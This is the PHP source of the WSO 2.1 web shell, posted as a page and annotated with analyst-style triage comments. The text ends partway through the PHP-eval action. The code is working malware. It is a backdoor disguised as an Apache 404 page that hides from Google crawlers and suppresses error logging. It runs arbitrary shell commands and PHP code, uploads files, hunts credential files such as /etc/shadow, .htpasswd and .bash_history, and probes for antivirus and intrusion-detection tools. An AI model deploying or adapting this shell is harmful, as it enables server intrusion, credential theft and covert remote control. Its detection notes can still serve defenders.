
WSO 2.1 Web Shell

11 Feb 2014

WSO 2.1 Web Shell by devilscafe.in

WSO 2.1 Web Shell Source Code

   1 <?php 
   2 /* WSO 2.1 (Web Shell by devilscafe.in) */ 
// --- Shell configuration and runtime hardening (analyst notes) ---
// Access is gated on an MD5 hex digest rather than on the password itself; the
// comparison md5($_POST['pass']) == $auth_pass happens further down the file.
$auth_pass = "15de21c670ae7c3f6f3f1f37029303c9";
// Accent colour injected into the stylesheet by printHeader().
$color = "#00ff00";
// Action name used when no 'a' parameter arrives; its consumer (the action
// dispatcher) is not within the visible part of the file.
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
// Cloaking: a client whose User-Agent contains "Google" gets a bare 404 and the
// request ends, so crawlers never index the page. Triage note: a path that
// answers 404 to crawler UAs but 200 to a browser is a useful signal.
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
// Anti-forensics: silence all PHP error reporting/logging and lift the execution
// time limit so long-running commands are not cut short. Each call is @-prefixed
// so a disabled ini_set() fails silently as well.
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
// Undo magic_quotes_gpc escaping (PHP < 5.4 era) so commands, paths and code
// bodies arrive exactly as submitted. Only $_POST is normalised; the request
// parameters read by the visible code all come from $_POST (plus $_FILES for uploads).
if( get_magic_quotes_gpc() ) {
    function stripslashes_array($array) {
        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
    }
    $_POST = stripslashes_array($_POST);
}
/**
 * Fake "404 Not Found" page that doubles as the login form.
 *
 * The markup imitates an Apache error page (server name taken from HTTP_HOST,
 * port hard-coded to 80) and appends a password field styled white-on-white
 * with a white border, so a casual viewer sees only the error text. No 404
 * status header is sent here, so the response carries PHP's default status.
 * The form posts back to the same URL; the caller checks md5($_POST['pass']).
 * Always terminates the request with exit.
 *
 * Triage note: an Apache-style 404 body that also contains an
 * <input type=password> is characteristic of this shell family.
 */
function printLogin() {
    ?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
    <style>
        input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <center>
    <form method=post>
    <input type=password name=pass>
    </form></center>
    <?php
    // Nothing after the login form is rendered or executed.
    exit;
}
// --- Authentication gate ---
// The session flag is keyed on md5(HTTP_HOST), so a single PHP session can hold
// one "authenticated" flag per virtual host the script is reached through.
// A request is admitted when either:
//   * $auth_pass is empty (no password configured at all), or
//   * the POSTed 'pass' value md5-hashes to $auth_pass (loose == comparison).
// Anything else falls into printLogin(), which exits. The dangling else binds
// to the inner if, which is the intended reading here.
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( $auth_pass ) ||
        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        printLogin();
  47 
// --- Host environment and working directory ---
// Coarse OS detection: only the first three letters of PHP_OS are inspected,
// so "WINNT"/"WIN32" become 'win' and everything else is treated as 'nix'.
if( strtolower( substr(PHP_OS,0,3) ) == "win" )
    $os = 'win';
else
    $os = 'nix';
// Snapshot of hardening-relevant ini values; read with @ so a restricted
// ini_get() simply yields an empty value.
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
// The 'c' POST parameter is used verbatim as a chdir() target with no
// validation or base-directory check; a failed chdir is silenced by @ and
// $cwd below then stays at the original directory.
if( isset( $_POST['c'] ) )
    @chdir($_POST['c']);
$cwd = @getcwd();
// Normalise Windows separators so the UI can build paths with '/' throughout.
if( $os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
// Guarantee a trailing slash: later code concatenates file names directly onto $cwd.
if( $cwd[strlen($cwd)-1] != '/' )
    $cwd .= '/';
  64      
// --- Command presets for the console ---
// $aliases maps a human-readable label to a shell command line, chosen per OS.
// Entries with an empty command ("Find", "Locate") presumably act as section
// headers in a drop-down. Read as a whole, the list is a host-reconnaissance
// checklist: directory listings, listening ports, setuid/setgid binaries,
// world-writable paths, and configuration/credential files (config*.php,
// .htpasswd, .bash_history, service.pwd, .fetchmailrc). The consumer of
// $aliases (the Console action) is outside the visible part of the file.
// Triage note: these exact command strings appearing in process or audit logs
// under the web server user are a strong indicator of this shell in use.
if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
          "List dir" => "ls -la",
        "list file attributes on a Linux second extended file system" => "lsattr -va",
          "show opened ports" => "netstat -an | grep -i listen",
        "Find" => "",
          "find all suid files" => "find / -type f -perm -04000 -ls",
          "find suid files in current dir" => "find . -type f -perm -04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls",
          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          "find config.inc.php files" => "find / -type f -name config.inc.php",
          "find config* files" => "find / -type f -name \"config*\"",
          "find config* files in current dir" => "find . -type f -name \"config*\"",
          "find all writable folders and files" => "find / -perm -2 -ls",
          "find all writable folders and files in current dir" => "find . -perm -2 -ls",
          "find all service.pwd files" => "find / -type f -name service.pwd",
          "find service.pwd files in current dir" => "find . -type f -name service.pwd",
          "find all .htpasswd files" => "find / -type f -name .htpasswd",
          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
          "find all .bash_history files" => "find / -type f -name .bash_history",
          "find .bash_history files in current dir" => "find . -type f -name .bash_history",
          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        "Locate" => "",
          "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"
    );
 126 
/**
 * Emit the shared page head: stylesheet, client-side helpers, the hidden
 * master form "mf", and the information banner with the navigation menu.
 *
 * Points worth knowing for triage:
 *  - $_POST['charset'] is defaulted to "UTF-8" in place and echoed unescaped
 *    into the <meta> tag and a hidden field; $_POST['a'] is echoed unescaped too.
 *  - The JS helpers g() and a() submit the hidden form "mf" whose fields are
 *    a, c, p1, p2, p3 and charset; every action of the shell is a POST of
 *    those names. a() sends the same fields via XMLHttpRequest with ajax=true,
 *    and processReqChange() eval()s the reply, which is "<length>\n<javascript>"
 *    (see actionPhp for the producer).
 *  - The banner calls php_uname(), getmyuid()/posix_* for user and group,
 *    diskfreespace()/disk_total_space() on $cwd, and
 *    gethostbyname($_SERVER['HTTP_HOST']) — a DNS lookup of the Host header on
 *    every page view is a possible log artefact.
 *  - Links the reported kernel string to google and to a milw0rm search URL.
 *
 * Reads globals $color, $cwd, $home_cwd, $os, $safe_mode and $auth_pass;
 * calls viewSize() and viewPermsColor().
 */
function printHeader() {
    if(empty($_POST['charset']))
        $_POST['charset'] = "UTF-8";
    global $color;
    ?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?></title>
<style>
    body {background-color:#000;color:#fff;}
    body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
    span,h1,a    { color:<?=$color?> !important; }
    span        { font-weight: bolder; }
    h1            { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
    div.content    { padding: 5px;margin-left:5px;}
    a            { text-decoration:none; }
    a:hover        { background:#ff0000; }
    .ml1        { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
    .bigarea    { width:100%;height:250px; }
    input, textarea, select    { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; }
    form        { margin:0px; }
    #toolsTbl    { text-align:center; }
    .toolsInp    { width: 80%; }
    .main th    {text-align:left;}
    .main tr:hover{background-color:#5e5e5e;}
    .main td, th{vertical-align:middle;}
    pre            {font-family:Courier,Monospace;}
    #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
    function set(a,c,p1,p2,p3,charset) {
        if(a != null)document.mf.a.value=a;
        if(c != null)document.mf.c.value=c;
        if(p1 != null)document.mf.p1.value=p1;
        if(p2 != null)document.mf.p2.value=p2;
        if(p3 != null)document.mf.p3.value=p3;
        if(charset != null)document.mf.charset.value=charset;
    }
    function g(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        document.mf.submit();
    }
    function a(a,c,p1,p2,p3,charset) {
        set(a,c,p1,p2,p3,charset);
        var params = "ajax=true";
        for(i=0;i<document.mf.elements.length;i++)
            params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
        sr('<?=$_SERVER['REQUEST_URI'];?>', params);
    }
    function sr(url, params) {
        if (window.XMLHttpRequest) {
            req = new XMLHttpRequest();
            req.onreadystatechange = processReqChange;
            req.open("POST", url, true);
            req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
            req.send(params);
        }
        else if (window.ActiveXObject) {
            req = new ActiveXObject("Microsoft.XMLHTTP");
            if (req) {
                req.onreadystatechange = processReqChange;
                req.open("POST", url, true);
                req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
                req.send(params);
            }
        }
    }
    function processReqChange() {
        if( (req.readyState == 4) )
            if(req.status == 200) {
                //alert(req.responseText);
                var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
                var arr=reg.exec(req.responseText);
                eval(arr[2].substr(0, arr[1]));
            }
            else alert("Request error!");
    }
</script>
<head><body><div style="position:absolute;width:100%;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
</form>
<?php
    // Disk figures for the banner; total is forced to 1 so the percentage
    // below never divides by zero when disk_total_space() fails.
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r');
    $kernel = @php_uname('s');
    // External exploit-search link built from the kernel string. Note the
    // strpos() arguments are reversed (haystack is the literal 'Linux'), so
    // the first branch only matches when $kernel is a substring of "Linux".
    $millink='http://milw0rm.com/search.php?dong=';
    if( strpos('Linux', $kernel) !== false )
        $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
    else
        $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
    // Effective user/group: POSIX names when the extension is available,
    // otherwise numeric ids with the group name left as "?".
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(@posix_geteuid());
        $gid = @posix_getgrgid(@posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }
    // Clickable breadcrumb: each path component links to the FilesMan action
    // with the cumulative prefix as the target directory.
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n=count($path);
    for($i=0;$i<$n-1;$i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for($j=0;$j<=$i;$j++)
            $cwd_links .= $path[$j].'/';
        $cwd_links .= "\")'>".$path[$i]."/</a>";
    }
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach($charsets as $item)
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
    // Navigation menu: label => action name passed as 'a'. "Logout" is only
    // offered when a password is configured; "Self remove" is always present.
    $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
    if(!empty($GLOBALS['auth_pass']))
    $m['Logout'] = 'Logout';
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach($m as $k => $v)
        $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
    // On Windows, probe every drive letter a: through z: with is_dir().
    $drives = "";
    if ($GLOBALS['os'] == 'win') {
        foreach( range('a','z') as $drive )
        if (is_dir($drive.':\\'))
            $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
    }
    // Banner. The "<?=$color?>" inside the Safe-mode OFF string is part of a
    // PHP string literal, so it is emitted as literal text, not interpolated.
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'.
         '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>:'.$drives.'</td>'.
         '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
         '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
}
 267 
/**
 * Emit the fixed tool strip at the bottom of every page and close the document.
 *
 * Six small forms, each wired through the JS helper g() to the hidden form:
 * change directory (c), read file (FilesTools/p1), make directory
 * (FilesMan/mkdir), make file (FilesTools/mkfile), execute a command (Console)
 * and a real multipart upload form posting a, c, p1=uploadFile, charset and
 * the file field f. Writable-ness of $cwd is shown next to the write actions.
 *
 * Triage notes: a multipart POST carrying exactly those hidden fields is the
 * upload signature of this shell. The upload form's action value is spelled
 * 'FilesMAn' (mixed case); the dispatcher that matches it is not in the
 * visible part of the file. The table tag contains a stray quote
 * (width=100%") that browsers tolerate.
 */
function printFooter() {
    $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
?>
</div>
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
    <tr>
        <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
    </tr>
    <tr>
        <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
        <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>
    <tr>
        <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
        <td><form method='post' ENCTYPE='multipart/form-data'>
        <input type=hidden name=a value='FilesMAn'>
        <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
        <input type=hidden name=p1 value='uploadFile'>
        <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
        <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
    </tr>

</table>
</div>
</body></html>
<?php
}
// Stubs for the POSIX lookups used by printHeader() and the file listing: when the
// real function is absent, declare a version that returns false so callers fall
// back to numeric uid/gid. The disable_functions check skips the declaration when
// the administrator has disabled the name, presumably to avoid a fatal error.
if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
/**
 * Run a shell command line and return its output as a string.
 *
 * Tries, in order, exec(), passthru(), system(), shell_exec() and finally
 * popen(); the first primitive that exists is used and the rest are never
 * consulted. Hardening consequence: listing only some of these names in
 * disable_functions does not stop this routine — all five have to be disabled
 * together (function_exists() is presumably what makes a disabled name fall
 * through to the next branch). Output-producing variants are captured with
 * output buffering; every call is @-suppressed, so a failure yields '' rather
 * than a logged warning. $in reaches the shell verbatim, unquoted.
 *
 * @param string $in  command line to execute
 * @return string     captured output, or '' when no execution primitive is available
 */
function ex($in) {
    $out = '';
    if(function_exists('exec')) {
        // exec() returns lines as an array; join them back with newlines.
        @exec($in,$out);
        $out = @join("\n",$out);
    }elseif(function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    }elseif(function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    }elseif(function_exists('shell_exec')) {
        $out = shell_exec($in);
    }elseif(is_resource($f = @popen($in,"r"))) {
        // Last resort: read the pipe in 1 KiB chunks until EOF.
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
 321 function viewSize($s) { 
 322     if($s >= 1073741824) 
 323         return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 
 324     elseif($s >= 1048576) 
 325         return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 
 326     elseif($s >= 1024) 
 327         return sprintf('%1.2f', $s / 1024 ) . ' KB'; 
 328     else 
 329         return $s . ' B'; 
 330 } 
 331 
 332 function perms($p) { 
 333     if (($p & 0xC000) == 0xC000)$i = 's'; 
 334     elseif (($p & 0xA000) == 0xA000)$i = 'l'; 
 335     elseif (($p & 0x8000) == 0x8000)$i = '-'; 
 336     elseif (($p & 0x6000) == 0x6000)$i = 'b'; 
 337     elseif (($p & 0x4000) == 0x4000)$i = 'd'; 
 338     elseif (($p & 0x2000) == 0x2000)$i = 'c'; 
 339     elseif (($p & 0x1000) == 0x1000)$i = 'p'; 
 340     else $i = 'u'; 
 341     $i .= (($p & 0x0100) ? 'r' : '-'); 
 342     $i .= (($p & 0x0080) ? 'w' : '-'); 
 343     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 
 344     $i .= (($p & 0x0020) ? 'r' : '-'); 
 345     $i .= (($p & 0x0010) ? 'w' : '-'); 
 346     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 
 347     $i .= (($p & 0x0004) ? 'r' : '-'); 
 348     $i .= (($p & 0x0002) ? 'w' : '-'); 
 349     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 
 350     return $i; 
 351 } 
 352 function viewPermsColor($f) {  
 353     if (!@is_readable($f)) 
 354         return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; 
 355     elseif (!@is_writable($f)) 
 356         return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; 
 357     else 
 358         return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>'; 
 359 } 
// Polyfill for scandir() on PHP builds without it (PHP < 5). Returns directory
// entries in readdir() order, unsorted, including "." and "..". $files is only
// created when at least one entry is read, so an unreadable or empty directory
// yields null rather than an array; the caller compares against === false.
if(!function_exists("scandir")) {
    function scandir($dir) {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh))) {
            $files[] = $filename;
        }
        return $files;
    }
}
/**
 * Look up an executable on the server's PATH by running `which <name>` via ex().
 * Returns the raw output as ex() produced it, or false when nothing was printed.
 * $p is concatenated into the command line unquoted; within the visible file it
 * is only called from actionSecInfo() with fixed program names.
 */
function which($p) {
    $path = ex('which '.$p);
    if(!empty($path))
        return $path;
    return false;
}
/**
 * "Sec. Info" action: host reconnaissance page.
 *
 * Reports server software, disabled PHP functions, open_basedir, safe-mode
 * directories, cURL availability and the database client libraries that are
 * compiled in. On 'nix' it additionally reports whether /etc/passwd and
 * /etc/shadow are readable (with view links), /proc/version and
 * /etc/issue.net, and — unless safe mode is on — probes PATH with which() for
 * three lists: build tools and interpreters ("Userful"), security and
 * monitoring software such as antivirus, IDS, firewalls and log watchers
 * ("Danger"), and download utilities ("Downloaders"); then /etc/hosts, df -h
 * and /etc/fstab. On Windows it runs ver, net accounts and net user.
 *
 * Triage notes: a burst of `which <tool>` executions for several dozen names
 * under the web server user within one request, combined with an attempted
 * read of /etc/shadow, is a strong signal. showSecParam() is declared inside
 * the function body, so a second call in the same request would presumably
 * hit a redeclaration error. The /etc/shadow view link passes "etc" without
 * the leading slash, unlike the passwd link above it.
 */
function actionSecInfo() {
    printHeader();
    echo '<h1>Server security information</h1><div class=content>';
    // Print "label: value"; multi-line values go into a <pre>. Empty values are skipped.
    function showSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>'.$n.': </span>';
            if(strpos($v, "\n") === false)
                echo $v.'<br>';
            else
                echo '<pre class=ml1>'.$v.'</pre>';
        }
    }

    showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
    showSecParam('Open base dir', @ini_get('open_basedir'));
    showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    showSecParam('Supported databases', implode(', ', $temp));
    echo '<br>';

    if( $GLOBALS['os'] == 'nix' ) {
        // Program names probed with which(): tooling, defensive software, downloaders.
        $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
        $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
        $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
        showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
        showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
        showSecParam('OS version', @file_get_contents('/proc/version'));
        showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
        if(!$GLOBALS['safe_mode']) {
            echo '<br>';
            $temp=array();
            foreach ($userful as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Userful', implode(', ',$temp));
            $temp=array();
            foreach ($danger as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Danger', implode(', ',$temp));
            $temp=array();
            foreach ($downloaders as $item)
                if(which($item)){$temp[]=$item;}
            showSecParam('Downloaders', implode(', ',$temp));
            echo '<br/>';
            showSecParam('Hosts', @file_get_contents('/etc/hosts'));
            showSecParam('HDD space', ex('df -h'));
            showSecParam('Mount options', @file_get_contents('/etc/fstab'));
        }
    } else {
        showSecParam('OS Version',ex('ver'));
        showSecParam('Account Settings',ex('net accounts'));
        showSecParam('User Accounts',ex('net user'));
    }
    echo '</div>';
    printFooter();
}
 442 
/**
 * "Php" action: evaluate arbitrary PHP source supplied in $_POST['p1'].
 *
 * Two paths:
 *  - AJAX (the ajax parameter is set): eval()s p1 under output buffering,
 *    records the preference in the session, and replies with
 *    "<length>\n<javascript>" where the script writes the HTML-escaped output
 *    into #PhpOutput; processReqChange() in printHeader() eval()s that reply.
 *    The request ends with exit before any page chrome is emitted.
 *  - Normal: renders the header; if p2 == 'info', dumps phpinfo() with its
 *    stylesheet rules stripped by preg_replace; prints the code textarea
 *    pre-filled with p1 and, if p1 is non-empty, eval()s it and prints the
 *    escaped output.
 *
 * Triage notes: this is the remote-code-execution primitive of the shell —
 * any POST with a=Php and a non-empty p1 is attacker-controlled PHP source.
 * The session key is md5(HTTP_HOST).'ajax'. The indentation before the
 * "Execution PHP-code" echo is misleading: the preceding if has no braces, so
 * only the session assignment is conditional and the form is always printed.
 */
function actionPhp() {
    if( isset($_POST['ajax']) ) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        eval($_POST['p1']);
        // The addcslashes character list contains the literal text &#92;&#48;,
        // so '&', '#', ';' and the digits 0,2,4,8,9 are backslash-escaped as
        // well as \n \r \t \\ and quotes — apparently an HTML-entity artefact.
        $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'&#92;&#48;")."';\n";
        // Reply format consumed by processReqChange(): byte length, newline, script.
        echo strlen($temp), "\n", $temp;
        exit;
    }
    printHeader();
    if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
        echo '<h1>PHP info</h1><div class=content>';
        ob_start();
        phpinfo();
        $tmp = ob_get_clean();
        // Strip phpinfo()'s own CSS so it does not override the shell stylesheet.
        $tmp = preg_replace('!body {.*}!msiU','',$tmp);
        $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
        $tmp = preg_replace('!h1!msiU','h2',$tmp);
        $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
        echo $tmp;
        echo '</div><br>';
    }
    // Braceless if: only the next statement is conditional; the echo after it always runs.
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
        echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
    echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
